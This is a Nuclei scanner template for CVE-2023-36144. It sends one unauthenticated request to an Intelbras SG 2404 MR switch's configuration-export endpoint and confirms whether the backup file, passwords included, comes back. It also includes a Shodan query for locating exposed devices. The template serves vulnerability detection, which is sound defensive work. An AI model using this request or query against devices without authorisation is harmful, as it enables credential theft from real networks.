nuclei-templates/http/cves/2023/CVE-2023-36144.yaml

50 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2023-36144
info:
2023-12-08 07:46:12 +00:00
name: Intelbras Switch - Information Disclosure
author: gy741
severity: high
description: |
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36144
- https://github.com/leonardobg/CVE-2023-36144
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36144
cwe-id: CWE-862
epss-score: 0.001740000
epss-percentile: 0.544840000
cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
2023-12-08 07:46:12 +00:00
metadata:
max-request: 1
shodan-query: title:"Intelbras"
tags: cve,cve2023,intelbras,switch,exposure
http:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'
matchers-condition: and
matchers:
- type: word
2023-12-08 07:46:12 +00:00
part: body
words:
- 'System Description'
- 'System Version'
- 'System Name'
condition: and
2023-12-08 07:46:12 +00:00
- type: word
part: header
words:
- 'attachment;filename='
- type: status
status:
- 200